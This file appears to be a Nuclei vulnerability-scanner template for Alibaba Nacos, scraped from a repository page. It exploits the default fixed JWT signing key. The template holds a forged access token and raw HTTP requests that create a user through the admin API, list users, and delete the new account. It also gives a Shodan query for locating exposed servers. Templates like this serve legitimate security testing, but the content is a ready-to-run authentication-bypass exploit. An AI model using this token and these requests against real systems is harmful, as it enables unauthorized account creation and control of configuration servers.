43 lines
1.7 KiB
YAML
43 lines
1.7 KiB
YAML
id: nacos-create-user
|
|
|
|
info:
|
|
name: Alibaba Nacos - Unauthorized Account Creation
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions.
|
|
reference:
|
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
shodan-query: title:"Nacos"
|
|
tags: nacos,unauth,bypass,instrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
payloads:
|
|
token:
|
|
- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ
|
|
attack: pitchfork
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1 == 200 && contains(body_1,'create user ok!')"
|
|
- "status_code_3 == 200 && contains(body_3,'delete user ok!')"
|
|
condition: and
|
|
|
|
# digest: 4b0a00483046022100b75b85488cc77c4a6f283eb4c774bca27d10c6eebbe558d5d64305214c9fc6d402210081592f2b20775388397ea1996afb810db1e0201e708c58452ac453b4f67f1a54:922c64590222798bb761d5b6d8e72950
|